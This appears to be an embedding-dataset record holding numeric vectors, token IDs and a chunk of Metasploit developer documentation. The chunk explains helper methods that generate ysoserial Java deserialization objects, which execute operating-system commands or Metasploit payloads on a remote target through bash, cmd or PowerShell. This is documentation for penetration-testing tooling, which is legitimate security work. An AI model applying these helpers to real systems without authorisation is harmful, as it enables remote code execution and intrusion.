0.8337330222129822, -0.02923949435353279, 0.06396262347698212, 0.4852933883666992, -0.5903593301773071, -0.41700494289398193, -0.028872370719909668, -0.1882200986146927, -0.2609250247478485, 0.5207257270812988, -0.20963174104690552, 0.47614067792892456, -0.2504310607910156, 0.1646183580160141, -1.029640555381775, 0.1580808162689209, -0.09980941563844681, -0.8082438111305237, 1.4047597646713257, 0.038425263017416, -0.7784302830696106, -0.018371298909187317, 0.1961333155632019, 0.4047567844390869, -0.0128632215783, -0.48406147956848145, -0.2452036589384079, -0.30838289856910706, -0.011867803521454334, -0.7349022030830383, 0.7367296814918518, -0.016815876588225365, -0.3375309705734253, 0.21052315831184387, -0.6764362454414368, -0.7137145400047302, -0.5691756010055542, 0.12148800492286682, -0.3198981285095215, 1.0060830116271973, 0.41652050614356995, 0.8681426644325256, -0.011526660993695259, -0.5769739747047424, -0.39043354988098145, 0.5547494292259216, 1.1561765670776367, -0.39908790588378906, 0.7485296726226807, 0.744198739528656, 0.35986924171447754, -0.024021008983254433, 0.425735205411911, 0.40584230422973633, -0.11366088688373566, 0.08734700828790665, -0.24188551306724548, -0.354467511177063, -0.7096471786499023, -0.46863991022109985, -0.259987473487854, 0.13016368448734283, 0.339544415473938, -0.3565295338630676, -1.0151408910751343, -0.23849160969257355, -0.47952672839164734, 0.037968382239341736, 0.03073025681078434, 0.2419515997171402, 0.15055646002292633, 0.2220502346754074, 0.8635598421096802, -1.4703264236450195, 4.260543346405029, 0.30486637353897095, 0.6127320528030396, 0.39668789505958557, 0.11289960891008377, 1.3160802125930786, 1.3567988872528076, -0.810716986656189, 0.6817558407783508, -0.3995518088340759, 0.7496793866157532, -0.2951868772506714, 0.16369301080703735, 0.10733597725629807, 0.6888620257377625, 0.32995328307151794, -0.34471991658210754, 0.07006683945655823, 0.31797847151756287, -0.9458541870117188, -1.354418158531189, -0.1335994303226471, -0.4942328929901123, 0.6864389777183533, 0.6699435114860535, -0.5274235010147095, 0.18889953196048737, -0.6010557413101196, 0.05384793132543564, 0.3249947130680084, -0.4526940584182739, -0.248273104429245, 0.13688193261623383, 0.1400061547756195, -0.7591216564178467, -0.12488279491662979, 0.07325076311826706, -0.46833470463752747, -0.06525829434394836, 0.3978113532066345, -0.042837828397750854, 0.07744588702917099, 0.43123188614845276, -0.7258127331733704, -0.25867095589637756, 0.6418342590332031, -0.386008620262146, 0.4681348502635956, 0.7110644578933716, -0.6094226241111755, 0.679878830909729, -0.18339620530605316, 0.6357468962669373, -0.32044753432273865, -0.4412352442741394, 0.0118931345641613, -0.0404089130461216, -0.31269267201423645, -0.13410958647727966, -0.3858737647533417, 0.7889697551727295, -0.010993150994181633, -0.24434794485569, -0.1937282383441925, -0.09655030071735382, 0.7867532968521118, -0.5257871150970459, 0.04077020660042763, 0.08723469078540802, -0.19450286030769348, 0.0636950209736824, -0.4113940894603729, -0.21947836875915527, -0.1480558067560196, 1.2111409902572632, -0.33625635504722595, -0.19025899469852448, 0.211592435836792, 0.12467246502637863, -0.22416341304779053, -0.20005114376544952, -0.7481387257575989, -1.6770960092544556, 0.16995671391487122, 0.685759961605072, 1.1467232704162598, 0.19303172826766968, -0.5149243474006653, 0.07557158172130585, 0.5878407955169678, 0.297946572303772, 0.23280449211597443, -0.28890353441238403, 0.360922634601593, 0.4977242350578308 ]
[ 101, 2612, 1997, 7861, 8270, 4667, 10763, 9262, 27289, 5200, 1010, 18804, 13102, 4135, 4183, 4107, 1061, 17063, 11610, 2140, 1011, 7013, 8026, 12086, 2007, 2328, 1011, 1999, 6721, 3989, 1012, 1996, 6666, 1997, 2478, 1996, 18804, 13102, 4135, 4183, 3075, 2421, 19059, 11336, 2458, 1010, 6082, 1011, 2000, 1011, 3191, 3642, 1010, 1998, 2925, 1011, 6947, 9262, 27289, 5200, 1012, 2000, 2224, 1996, 1061, 17063, 11610, 2140, 8860, 1010, 2292, 1521, 1055, 2298, 2012, 2019, 2742, 2013, 1996, 11895, 3217, 1035, 3342, 4168, 1035, 1058, 12521, 2549, 1035, 4078, 11610, 3669, 4371, 11336, 1024, 2742, 3642, 2378, 2023, 2742, 1024, 1006, 1048, 14526, 1007, 1996, 11336, 2950, 1996, 5796, 2546, 1024, 1024, 18077, 1024, 1024, 9262, 6155, 11610, 22731, 4666, 2378, 1012, 2023, 14451, 2015, 1996, 4072, 4725, 1012, 1006, 1048, 2581, 2683, 1007, 2059, 2009, 3594, 1996, 9699, 1035, 9262, 1035, 4078, 11610, 22731, 1035, 2005, 1035, 18093, 4118, 2000, 3443, 1037, 27289, 9262, 4874, 2241, 2006, 1996, 7674, 26895, 18491, 2015, 2475, 1061, 17063, 11610, 2140, 18093, 2008, 2097, 15389, 1996, 18804, 13102, 4135, 4183, 18093, 1012, 3602, 2008, 1996, 18804, 13102, 4135, 4183, 18093, 4874, 2003, 2979, 2004, 1011, 2003, 1010, 2302, 2151, 7584, 1012, 5641, 2421, 5796, 2546, 1024, 1024, 18077, 1024, 1024, 6556, 1024, 1024, 8299, 20464, 11638, 2184, 2421, 5796, 2546, 1024, 1024, 18077, 1024, 1024, 4204, 18223, 2340, 2421, 5796, 2546, 1024, 1024, 18077, 1024, 1024, 9262, 6155, 11610, 22731, 2260, 2410, 13366, 3988, 4697, 1006, 18558, 1027, 1063, 1065, 1007, 1012, 1012, 1012, 6275, 13366, 18077, 6535, 9262, 1035, 18093, 1027, 9699, 1035, 9262, 1035, 4078, 11610, 22731, 1035, 2005, 1035, 18093, 1006, 1005, 7674, 26895, 18491, 2015, 2475, 1005, 1010, 18093, 1007, 3770, 27715, 18209, 1027, 29347, 2015, 1035, 4372, 26775, 22571, 2102, 1006, 9262, 1035, 18093, 1007, 2320, 1996, 27289, 4874, 2003, 7013, 1998, 8250, 2004, 9262, 1035, 18093, 1010, 2009, 1521, 1055, 2059, 2741, 2000, 1996, 4539, 1999, 2019, 18077, 1011, 3563, 5450, 1012, 4725, 1001, 9699, 1035, 9262, 1035, 4078, 11610, 22731, 1035, 2005, 1035, 18093, 1006, 2171, 1010, 18093, 1007, 2023, 4118, 2097, 9699, 1037, 27289, 9262, 4874, 2008, 2043, 8209, 2097, 15389, 1996, 9675, 18804, 13102, 4135, 4183, 18093, 1012, 1996, 18093, 2097, 2022, 4991, 2000, 2019, 4082, 2291, 3094, 2478, 2028, 1997, 1996, 3569, 5461, 4838, 2306, 2023, 4118, 1998, 2059, 2979, 2000, 1001, 9699, 1035, 9262, 1035, 4078, 11610, 22731, 1035, 2005, 1035, 3094, 1012, 2171, 1011, 1996, 18093, 2171, 16381, 2442, 2022, 2028, 1997, 1996, 3569, 18093, 2015, 8250, 1999, 1996, 1061, 17063, 11610, 2140, 17053, 1012, 2004, 1997, 2023, 3015, 1010, 1996, 2862, 2950, 1024, 13435, 18223, 2140, 2487, 1010, 18856, 8649, 5397, 1010, 7674, 4783, 24076, 3775, 4877, 2487, 1010, 7674, 26895, 18491, 2015, 2475, 1010, 7674, 26895, 18491, 2015, 2509, 1010, 7674, 26895, 18491, 2015, 2549, 1010, 7674, 26895, 18491, 2015, 2629, 1010, 7674, 26895, 18491, 2015, 2575, 1010, 24665, 9541, 10736, 2487, 1010, 7632, 5677, 12556, 2487, 1010, 1046, 15853, 11493, 3334, 3401, 13876, 5668, 2487, 1010, 3781, 8737, 20464, 11638, 1010, 1046, 3385, 2487, 1010, 9262, 18719, 3367, 8545 ]
metasploit
133.txt
0
##ld1, jdk7u21, mozillarhino1, myfaces1, rome, spring1, spring2, and vaadin1. while ysoserial includes additional payloads that are not listed above, they are unsupported by the library due to the need for complex inputs. should there be use cases for additional payloads, please consider opening an issue and submitting a pull request to add support. payload - the payload object to execute on the remote system. this is the native metasploit payload object and it will be automatically converted to an operating system command using a technique suitable for the target platform and architecture. for example, x86 windows payloads will be converted using a powershell command. not all platforms and architecture combinations are supported. unsupported combinations will result in a runtimeerror being raised which will need to be handled by the module developer. # generate _ java _ deserialization _ for _ command ( name, shell, command ) this method will generate a serialized java object that when loaded will execute the specific operating system command using the specified shell. invocation of the command through the shell effectively bypasses constraints on the characters within the operating system command. name - the payload name parameter. this has the same significance as the name parameter for the # generate _ java _ deserialization _ for _ payload method. shell - the shell to use for invoking the command. this value must be one of the following : bash - a modified version that will invoke the command using the bash executablecmd - a modified version that will invoke the command using the windows cmd. exe executable. powershell - a modified version that will invoke the command using the windows powershell. exe executable. command - the operating system command to execute upon successful deserialization of the generated object. regenerating the ysoserial _ payload json file ( maintainers only ) neither module developers nor users need to concern themselves with the following. on occasion, metasploit maintainers may want to re - run the script generation to incorporate new java serialized objects from the ysoserial tool. to avoid invoking java ( and all its dependencies ) at runtime, the serialized objects are generated and cached within a json file. the json file can be refreshed using a standalone ruby script, which comes prepackaged with a docker image that handles downloading
[ 0.16554416716098785, -0.43699270486831665, -0.07903192192316055, 0.9746050834655762, -0.6501145362854004, 0.0155645702034235, -0.6599071025848389, 0.19809262454509735, 0.6880893111228943, 0.3397189974784851, 0.6574574708938599, -0.17136447131633759, -0.3616175651550293, -0.2581002116203308, -0.4730978012084961, -0.17017501592636108, -0.006162119098007679, -0.03443880006670952, -0.7696374654769897, -0.5643467903137207, -0.10302642732858658, 0.26442670822143555, -1.040722370147705, -0.8796516060829163, -0.34968769550323486, 0.7142782807350159, 0.029194770380854607, -0.09142493456602097, 0.30359286069869995, 0.3078358471393585, 0.31604233384132385, -0.31172600388526917, 0.3878772258758545, -0.4596157371997833, 0.27140212059020996, -0.23048169910907745, 0.9108437895774841, -0.4065819978713989, 0.3573046326637268, -0.7539328336715698, 0.9242204427719116, -0.08334378898143768, -0.48462584614753723, 0.06745944172143936, -0.04670780524611473, -0.668508768081665, 0.6405310034751892, -0.3895792067050934, 0.06086983159184456, 0.3313073515892029, 0.35703691840171814, 0.5866692662239075, -0.08639538288116455, 0.022867996245622635, -0.1915355920791626, -0.2007131725549698, -0.36050137877464294, -0.27543073892593384, 0.14229954779148102, -0.06066518649458885, -0.49925410747528076, 0.34632089734077454, 0.24564041197299957, -0.2504105567932129, -0.7016230225563049, 0.009241556748747826, 0.1626107543706894, -0.03507482632994652, 0.0098398607224226, -0.2798713445663452, -0.0666889175772667, 0.7925005555152893, -0.3586310148239136, -0.7318384051322937, -0.44395458698272705, 0.20128977298736572, -0.637196958065033, -0.1470174640417099, -0.32167530059814453, -0.1850481778383255, -0.14227259159088135, 0.5182664394378662, -0.16212350130081177, -0.278583288192749, -0.01014643907546997, -0.4391089975833893, 0.7477684617042542, 0.724897563457489, -0.3124709725379944, 0.6794494986534119, 0.3269728720188141, 0.20177681744098663, -1.4054887294769287, -0.425223171710968, -0.0887918472290039, 0.09032087028026581, -0.005518119782209396, 0.07414454221725464, -0.12028412520885468, -0.22114938497543335, 0.9330564141273499, 0.36012953519821167, 0.224964439868927, 0.592465877532959, -0.21289043128490448, 0.4697793126106262, 0.7700362205505371, 0.024772193282842636, -0.22771014273166656, -0.1728091537952423, 0.8529363870620728, 0.4009130299091339, 0.11891373991966248, -0.3949323296546936, 0.14042162895202637, 0.22681061923503876, 0.8357210159301758, 0.38172391057014465, -0.3532334864139557, 0.8382774591445923, -0.26161742210388184, -0.0036536471452564, 0.044003330171108246, 0.21991515159606934, -0.2769898474216461, -0.6877761483192444, 0.7027024626731873, 0.32970404624938965, -0.4549964666366577, -0.4636528789997101, 0.04475630074739456, -0.49408426880836487, 0.30408763885498047, 0.763595700263977, -0.3087826371192932, 0.22437278926372528, 0.5167613625526428, -0.24486078321933746, 0.9263491630554199, -0.5252093076705933, -0.41828441619873047, 0.4319608807563782, 0.5823288559913635, 1.314942479133606, -0.11404843628406525, 0.4664367735385895, -0.49166518449783325, 0.06289005279541016, -0.447358638048172, 0.08563537895679474, 0.15338924527168274, 0.29638931155204773, 0.8454493284225464, -0.15183691680431366, -0.46779489517211914, 0.1798027753829956, -0.00514940032735467, 0.6253282427787781, -0.3436438739299774, -0.11830270290374756, -0.129659965634346, 0.6296976804733276, 0.025185074657201767, 0.08081839233636856, -0.37294620275497437, 0.20276501774787903, -0.67951500415802, -0.21057367324829102, -0.8047672510147095, -0.03816238045692444, 0.8673480153083801, 0.17419037222862244, 0.07967516034841537, 0.005206375382840633, 0.7631792426109314, 1.0271236896514893, -0.45852625370025635, 0.12123054265975952, 0.44899782538414, -0.27207550406455994, -0.5358899235725403, 0.41153085231781006, 0.5890108942985535, 1.02643620967865, 0.23097474873065948, 0.24169376492500305, -0.1338329017162323, -0.3380201756954193, 0.32317420840263367, -0.3609633445739746, -0.42805758118629456, 0.38240012526512146, -0.20504754781723022, 0.7298036217689514, 0.5682280659675598, 0.23906034231185913, -0.7963184714317322, -0.29416677355766296, -0.5931287407875061, -0.30502140522003174, -0.20182684063911438, 0.47280487418174744, -0.42825454473495483, -0.015197564847767353, -0.8532309532165527, -0.06382942199707031, 1.2993838787078857, 0.49094682931900024, -0.025266706943511963, 1.0154036283493042, 0.49184972047805786, -0.24884100258350372, -0.29109933972358704, 0.37845298647880554, -0.01756862923502922, 0.07330134510993958, -0.6817789077758789, 0.49220147728919983, -0.08277672529220581, 0.08037510514259338, -0.21974265575408936, 0.4453553557395935, 0.5763120651245117, 0.009815540164709091, 0.029296966269612312, -0.8310062289237976, 0.2612764537334442, 0.4369574785232544, -0.6507359743118286, 0.24608631432056427, -0.13928848505020142, 0.00553311500698328, -0.07182710617780685, 0.9157279133796692, 0.2321423441171646, -0.17254702746868134, 0.40375232696533203, 0.19584913551807404, 0.21662285923957825, -0.31872910261154175, 0.22772128880023956, 1.0061837434768677, 0.4167264997959137, 0.14320911467075348, 0.6129610538482666, 0.5715824961662292, 0.07048186659812927, 0.19895285367965698, 0.4898050129413605, -0.28464722633361816, -0.05731341987848282, 0.4262297749519348, 0.45019954442977905, 0.28532400727272034, -1.04367196559906, -0.2169816792011261, 0.6046385169029236, 0.7507877945899963, -0.49393394589424133, -0.4734002351760864, -0.04045437276363373, 0.0348283052444458, -0.5349239110946655, -0.4227588474750519, 0.032887961715459824, 0.6958380341529846, 0.05103319138288498, -0.17303255200386047, 0.4862914979457855, -0.20344990491867065, -0.5597397685050964, 0.07254672795534134, -0.054069679230451584, -0.4808400273323059, -0.6837338805198669, -0.21251587569713593, 0.010837200097739697, -0.3545522689819336, 0.5855845808982849, -0.6977187395095825, -0.4210888147354126, 0.18549886345863342, -0.1870444416999817, 0.4481621980667114, 0.04361904785037041, -0.4397386312484741, -0.9187823534011841, 0.010765669867396355, 0.1517188549041748, 0.7002459764480591, -0.062078528106212616, -0.6884170770645142, -0.34322458505630493, -0.1087016761302948, -0.5064365863800049, -0.1664842665195465, 0.6681380867958069, -0.17761220037937164, -0.10828758776187897, -0.1061164066195488, 0.7385724782943726, -0.021057670935988426, 0.3954518139362335, 0.41678178310394287, -0.7962179780006409, 0.6357297897338867, -0.17652331292629242, 0.16243143379688263, 0.298946350812912, 0.6553496718406677, -1.1175742149353027, 1.0060529708862305, 0.11750255525112152, -0.09150400012731552, -0.513754665851593, 0.865326464176178, 0.0741189569234848, 0.17974334955215454, -0.05995946750044823, -0.46208834648132324, -0.28834137320518494, -0.30998295545578003, -0.05026960000395775, -0.05312492698431015, -0.5734767317771912, 0.24659132957458496, -0.14907579123973846, -0.2880684435367584, 0.19261565804481506, -0.5915600657463074, -0.36368218064308167, 0.163864403963089, -0.5751710534095764, 0.45302292704582214, -0.03191354498267174, -0.07642215490341187, 0.0011195834958925843, -0.19890514016151428, -0.223208487033844, -0.13578973710536957, -0.2407131940126419, -0.5504720211029053, 0.5616266131401062, 0.5697254538536072, -0.7142277359962463, 0.8771255612373352, 0.9184620976448059, 0.14690697193145752, -0.23307037353515625, 0.10584703087806702, -0.8495773077011108, -0.2557302415370941, 0.24532075226306915, 0.08166184276342392, 0.25989609956741333, 0.6780191659927368, -0.4570167362689972, -0.48962825536727905, 0.3702878952026367, -0.047030866146087646, -0.31022876501083374, -0.27887141704559326, -0.05164192244410515, 0.2971250116825104, -0.1930166780948639, -0.14735403656959534, 0.2896135747432709, 0.3136686086654663, 0.010681628249585629, -0.37520739436149597, 0.4275825321674347, -0.36110150814056396, -0.13011521100997925, 0.2093760073184967, -0.10455303639173508, -0.37188270688056946, 0.5919448137283325, 0.13829536736011505, 0.30775055289268494, -0.7052146196365356, -0.008944256231188774, 0.17955182492733002, -0.13051718473434448, 0.0976649671792984, 0.12544570863246918, -0.8032910823822021, -0.57370924949646, -0.32020387053489685, 0.39557263255119324, -0.340639591217041, -0.12118898332118988, -0.22829709947109222, 0.11455903947353363, -0.21067410707473755, -0.8992507457733154, -0.4792327582836151, 0.4405692517757416, 0.7754825353622437, 0.0991918295621872, 0.8827959299087524, 0.7675377726554871, 0.13180024921894073, -0.40047475695610046, 0.3018319010734558, -0.5107885599136353, 0.5391595363616943, 0.004972940776497126, 0.649803102016449, -0.5695808529853821, 0.1894671618938446, -0.26395902037620544, -0.2280871868133545, -0.13197308778762817, -0.1879633516073227, 0.08575178682804108, 0.2965458929538727, -0.3105891942977905, -0.09720664471387863, 0.11695250868797302, -0.055166102945804596, 0.09632793813943863, -0.46692734956741333, -0.4463905990123749, 0.2908999025821686, 0.37235599756240845, -0.8637849688529968, -0.48981422185897827, -0.5994021892547607, 0.04972877353429794, -0.2213508039712906, -0.03203679621219635, 0.05988946929574013, -0.8678274154663086, -0.366258829832077, -0.33748897910118103, -0.0077022225596010685, 0.3716389834880829, 0.2626296281814575, 0.002119761658832431, -0.8123478293418884, -0.048128869384527206, 0.5741692781448364, -0.19443117082118988, -0.5150836110115051, -0.341488778591156, 0.19012263417243958, 0.6164426803588867, 0.22250309586524963, -0.5943710803985596, -0.4848994016647339, 0.15217918157577515, -0.7604019045829773, 0.5923753380775452, -1.2066389322280884, 0.4226849377155304, 0.5629599690437317, -0.3650757074356079, 0.04258102923631668, -0.08480696380138397, -0.4062615633010864, -0.055907316505908966, -0.5039425492286682, 0.41779762506484985, -0.7486662864685059, 0.0912889689207077, 0.7461090683937073, 0.0737079307436943, 0.24158841371536255, 0.8032106161117554, -0.18934403359889984, 0.38902145624160767, -0.21874992549419403, 0.04939395934343338, -0.4802834093570709, 0.008344519883394241, -0.6212177872657776, 0.5323038101196289, 0.00017495214706286788, -0.08856795728206635, -0.28868868947029114, -0.2757472097873688, 0.6887236833572388, -0.08702211827039719, -0.47246429324150085, -0.3215082287788391, -0.5432366728782654, 0.4959121346473694, 0.29717499017715454, 0.1911526918411255, 0.3408927619457245, -0.15060389041900635, -0.20702922344207764, 0.028230512514710426, -0.09288003295660019, -0.9740731120109558, -0.7508367300033569, -0.38614243268966675, 0.04001748561859131, -0.29219603538513184, -0.8100615739822388, 0.5812764763832092, -0.30644646286964417, -0.6043955087661743, 0.6453258395195007, -0.0900966003537178, -0.2190694510936737, -0.4356454908847809, -0.11891505122184753, -0.9606702923774719, 0.3747749924659729, -0.6182966232299805, -0.07227309048175812, -0.9014381766319275, 0.6920897364616394, -0.17387132346630096, 0.5608606338500977, 0.3652786910533905, -0.21774795651435852, 0.09423515945672989, 0.5997490286827087, 0.4083980619907379, -0.4835996925830841, -0.022614846006035805, 0.5948927998542786, -0.7800154685974121, 0.08605228364467621, -0.07121261209249496, -0.6457147002220154, -0.8276269435882568, -0.8673315644264221, -0.19287148118019104, 0.0836976170539856, 0.2291775792837143, -0.3499697148799896, -0.8313996195793152, -0.07895505428314209, 0.11372386664152145, -0.19777469336986542, -0.5381988286972046, -0.1405787616968155, -0.20326797664165497, 0.17783649265766144, -0.0186608973890543, -0.15817688405513763, -0.20593643188476562, -0.6934154033660889, -0.35454216599464417, 0.6256625652313232, -0.4128180742263794, -0.21560002863407135, 0.10426682233810425, 0.2112257182598114, 0.47600454092025757, 0.34863314032554626, -0.339643657207489, -0.6084351539611816, 0.37438851594924927, -0.3733965754508972, -0.6865784525871277, 0.3202954828739166, -0.2080729901790619, 0.5576364398002625, -0.052932240068912506, -0.39044561982154846, 0.004382743034511805, -0.24827705323696136, -0.015482217073440552, 0.08447324484586716, 0.7404909133911133, -0.49719104170799255, 0.21667473018169403, 0.44521698355674744, 0.45377182960510254, 0.11008377373218536, 0.05743836238980293, -0.8028513193130493, 0.5654036402702332, -0.4898098409175873, -1.555009126663208, 0.5264587998390198, 0.1611245721578598, -0.6384371519088745, 0.38419637084007263, 0.1301458328962326, 0.08038860559463501, -0.5709642767906189, 0.36186784505844116, 0.8099595308303833, -0.3871318995952606, 0.35256633162498474, -0.7513792514801025, 0.15130497515201569, 0.6779151558876038, -0.282461553812027, 0.3610321581363678, 0.2550312280654907, 0.25373759865760803, -0.2676532566547394, -0.6277210116386414, -0.4828956425189972, -0.5680275559425354, -0.4082980751991272, 0.8351893424987793, -0.026637844741344452, 0.19388163089752197, 0.3110295832157135, -0.2838868200778961, -0.5601515769958496, -0.0965709462761879, 0.13944950699806213, -0.12219531834125519, 0.8008391261100769, 0.6922925710678101, 0.4308822751045227, -0.341724157333374, 0.12810106575489044, -1.0493719577789307, -0.5187835097312927, 0.6163535714149475, 0.1542048454284668, -0.9061559438705444, 0.9027693271636963, 0.42613527178764343, -0.4215337038040161, -0.6472043395042419, -0.9478937983512878, -0.47964203357696533, 0.09016105532646179, 0.1130010113120079, -0.504197895526886, -0.11449849605560303, -0.07441142946481705, -0.17966441810131073, 0.24504105746746063, 0.6606243848800659, 0.028836729004979134, -0.830592930316925, 0.08836400508880615, 0.18579190969467163, 0.32210275530815125, 0.7981597185134888, -0.27551981806755066, -0.05530695617198944, -0.8103964328765869, -0.7025355696678162, 0.23077893257141113, -0.07303488254547119, 0.5341846942901611, 0.10393267124891281, 0.6310460567474365, -0.24950817227363586, -0.1609235554933548, 0.8344829678535461, -0.15925399959087372, 0.44217875599861145, 1.126609444618225, 0.04919806495308876, -0.6006610989570618, -0.4564349353313446, 0.1375838667154312, -0.4710182845592499, 0.10388077050447464, -0.11759988218545914, -0.4259793162345886, -0.00838380679488182, 0.2489469051361084, -0.1963326334953308, -0.29722821712493896, -0.5523353815078735, -0.8954595327377319, -0.2409444898366928, -0.21351630985736847, 0.16967344284057617, -0.7292131185531616, 0.22814998030662537, -0.8307662010192871, 0.44125792384147644, -0.5225931406021118, 0.43292689323425293, -0.06105266138911247, 0.23943430185317993, -0.4536629915237427, 0.07731502503156662, -0.8042188286781311, -0.36439934372901917, -0.38797727227211, -0.27553442120552063, -0.6202494502067566, -0.7717998623847961, 0.2737995982170105, -0.20778782665729523, -1.071246862411499, 0.5440866351127625, 0.06438924372196198, 0.1751432865858078, 0.12521326541900635, -0.7452415823936462, -0.39414674043655396, 0.47785210609436035, 0.4041350781917572, 0.4076463282108307, 0.3891460597515106, -0.28733929991722107, 0.32551252841949463, -0.3301481604576111, -0.21119056642055511, 0.020116489380598068, 0.5213838815689087, 0.7668232917785645, 0.17762796580791473, -0.7368305921554565, 0.13550586998462677, 0.26064398884773254, -0.5508401989936829, 0.11456432938575745, -0.5705457925796509, 1.05203378200531, 0.06773243099451065, -0.16009972989559174, 0.32404208183288574, 0.6539973020553589, 0.110549695789814, 0.3265451490879059, -0.15351586043834686, 1.161214828491211, 0.6110907793045044, 0.39950186014175415, -0.016811640933156013, -0.055660489946603775, 0.4309767782688141, -0.8663337826728821, 0.02992302179336548, 0.7960949540138245, -0.40250664949417114, 0.5622507929801941, 0.2514418363571167, -0.37494000792503357, 0.027633028104901314, -0.20885267853736877, 0.14955203235149384, -0.028376512229442596, 0.24444317817687988, 0.16701577603816986, 0.343394935131073, 0.07782293856143951, -0.5342316031455994, -0.3367125689983368, -0.7592524290084839, -0.09170801192522049, -0.003643561154603958, -0.2882348895072937, -0.4313766360282898, 0.026039989665150642, -0.5178347229957581, -0.5980678200721741, -0.19071613252162933, 0.03985412418842316, 1.0015630722045898, 0.47667017579078674, 0.07260485738515854, 1.1962870359420776, -0.7732101678848267, -0.6444183588027954, -0.4274757504463196, 0.3894694149494171, -0.861408531665802, -1.1567492485046387, 0.06907140463590622, 1.5088249444961548, 0.009530249051749706, 0.040574464946985245, -0.5699796080589294, 0.37140345573425293, 0.48579317331314087, -0.0029014439787715673, 0.17266061902046204, 0.3135829269886017, -0.6382701992988586, 0.08385308086872101, -0.10518303513526917, 0.02016781084239483, 0.19320854544639587, -0.34987425804138184, 0.3416188061237335, -0.23051922023296356, -0.731896698474884, 0.06156641244888306, 0.3068549633026123, 0.326817125082016, 0.308684766292572, 0.6514115333557129, 0.21539518237113953, -0.34357258677482605, -0.09165625274181366, -0.4241468608379364, 0.11229514330625534, 0.16731277108192444, 0.47419843077659607, -0.06854008138179779, 0.46416422724723816, 0.11870334297418594, -0.657038688659668, -0.21083316206932068, 0.7026687264442444, 0.017551423981785774, -0.2541831433773041, 0.44976985454559326, -0.3481575846672058, 0.008959274739027023, -0.46141108870506287, -0.3860175311565399, 0.14306409657001495, -0.14703114330768585, -0.014470227062702179, -0.1585618406534195, -0.02466772496700287, 0.6912346482276917, -0.9410887956619263, 0.025811605155467987, 0.10513054579496384, -0.051387615501880646, 0.679588794708252, 0.21154864132404327, -0.5840902924537659, 0.893532931804657, 0.959295392036438, 0.2716408669948578, 0.057255253195762634, 0.2279413342475891, 0.004416019655764103, 0.13851633667945862, 0.5512883067131042, -0.42432349920272827, -1.0016816854476929, 0.07748357206583023, 0.2883084714412689, -0.25021445751190186, -0.7007458806037903, 0.03507881611585617, 0.5966007709503174, -0.2640261650085449, 0.11027540266513824, 0.08989184349775314, 0.12134963274002075, -0.05320706218481064, 0.6650298833847046, -0.15619295835494995, 0.26529237627983093, 0.39505404233932495, -0.3127906620502472, -0.349630206823349, 0.8212040066719055, -0.2503274977207184, 0.6834196448326111, 0.0014066646108403802, 0.8388863801956177, 0.1356862485408783, 0.5548721551895142, 0.1291826069355011, -0.5060929656028748, -0.25484001636505127, -0.04847922921180725, -0.35192883014678955, -0.4724600911140442, 0.2301028072834015, -0.3785439133644104, 0.6709352135658264, -0.17498739063739777, 0.4866112470626831, -0.541653573513031, 0.4553673565387726, -0.15133243799209595, -0.7706347703933716, 1.2503913640975952, -0.12210965156555176, -0.32140544056892395, -0.49179235100746155, -0.06727708131074905, 0.628216564655304, 0.4108887314796448, 0.17992864549160004, -0.48601362109184265, -0.43533003330230713, 0.36469095945358276, -0.2527718245983124, 0.22215473651885986, 0.008272668346762657, -0.15752264857292175, 0.15006928145885468, -0.5753155946731567, -0.308157742023468, 0.23127812147140503, -0.363154798746109, -0.02394561469554901, 0.4467196762561798, 0.5787045359611511, 0.5397433042526245, 0.7133355140686035, -0.11773724108934402, -0.41328227519989014, 0.3609928786754608, 1.1033763885498047, -0.3399672508239746, 0.15678909420967102, 0.019616173580288887, 0.011937316507101059, 0.21333374083042145, -0.21541474759578705, 0.34471046924591064, -0.6936396360397339, 0.0016777792479842901, -0.631794810295105, 0.03959202021360397, -1.0168254375457764, -0.5969048738479614, 0.1200929507613182, 0.053260575979948044, 0.40164655447006226, -0.09059402346611023, -0.7971011996269226, 0.0804804265499115, -0.2808071970939636, -0.0946771502494812, 0.26731008291244507, -0.09398294985294342, -0.006855294574052095, -0.06015000492334366, 0.991608202457428, -0.9426224231719971, 4.520578384399414, 0.19188888370990753, 0.3909231722354889, -0.5877158045768738, -0.13699252903461456, 0.5171136260032654, 0.9011026620864868, -0.8462566137313843, 0.5270838737487793, -0.23355911672115326, -0.02021114155650139, -0.028784682974219322, 0.051596321165561676, -0.2608144283294678, 0.7870885133743286, 0.4850928783416748, -0.09314440935850143, -0.09531856328248978, 0.4976106286048889, -0.9287812113761902, -0.9767131209373474, -0.3219486176967621, -0.843947172164917, 0.6916095018386841, 0.22764380276203156, 0.08539625257253647, 0.05897267535328865, -0.1675703525543213, 0.16544227302074432, -0.2562600076198578, -0.31537488102912903, -0.03433024510741234, 0.1439843326807022, 0.15864673256874084, -0.8850891590118408, -0.017667340114712715, -0.037958044558763504, -0.4474789798259735, -0.5638458132743835, -0.5846083760261536, 0.5382886528968811, 0.18048129975795746, -0.10600993782281876, -0.6323465704917908, -0.12408711016178131, 0.7852725982666016, 0.016258548945188522, 0.5350965261459351, 0.951404869556427, -0.519946813583374, 1.4141836166381836, 0.05030585452914238, 0.6396563053131104, -0.25398871302604675, -0.8145608901977539, 0.6514014005661011, -0.042971912771463394, 0.22539079189300537, 0.1570219248533249, 0.1393025666475296, 0.48088887333869934, -0.3697495758533478, 0.06378286331892014, -0.6677570343017578, -0.2525317370891571, 0.6098604202270508, 0.18196234107017517, 0.273551344871521, -0.14586398005485535, -0.06779616326093674, -0.24755741655826569, -0.5882660150527954, -0.7478423118591309, -0.16897810995578766, 0.9592490792274475, 0.2557291090488434, 0.10841706395149231, -0.09266780316829681, 0.7363545894622803, -0.11571997404098511, -0.26720768213272095, -0.03804387152194977, -1.2231347560882568, 0.26326805353164673, 0.5750481486320496, 0.7697430849075317, 0.08348023891448975, -0.9081363677978516, 0.052972231060266495, 0.31535112857818604, 0.20295575261116028, 0.2850108742713928, -1.0288219451904297, 0.5752338171005249, 0.12268989533185959 ]
